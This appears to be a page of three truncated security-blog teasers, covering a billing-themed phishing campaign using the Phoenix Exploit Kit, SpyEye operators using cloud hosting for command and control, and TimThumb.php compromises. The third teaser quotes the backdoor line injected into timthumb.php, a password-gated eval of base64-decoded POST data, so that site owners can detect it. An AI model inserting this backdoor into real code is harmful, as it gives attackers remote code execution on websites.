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The WebsenseR ThreatSeekerR Network has been tracking an ongoing malicious email campaign in which a recipient is asked to click a link to check a bill mistakenly received by another user.  We have been monitoring campaigns of thousands of emails similar to this one for a while now and notice that the Phoenix Exploit Kit is used. The campaign […]

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The title of this post suggests that I’ve been thinking of one of the cyber-criminals that uses SpyEye, maybe in admiration! But actually his cyber-criminal actions overshadow anything else. The truth is that, following my post highlighting the tactic of using as C&C one of the Cloud Computing services offered by Amazon, I found a […]

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Sep
2011

If your site got compromised lately with the TimThumb.php vulnerability, make sure to check that script to see if it was not modified to act as a backdoor as well. We are seeing in many sites the timthumb.php with the following code added to it: if (md5(md5($_POST[‘p’]))===’xxx8ab2ab.. a4ec61072xxx’) die(eval(base64_decode($_POST[‘c’]))); If you are not sure what this […]

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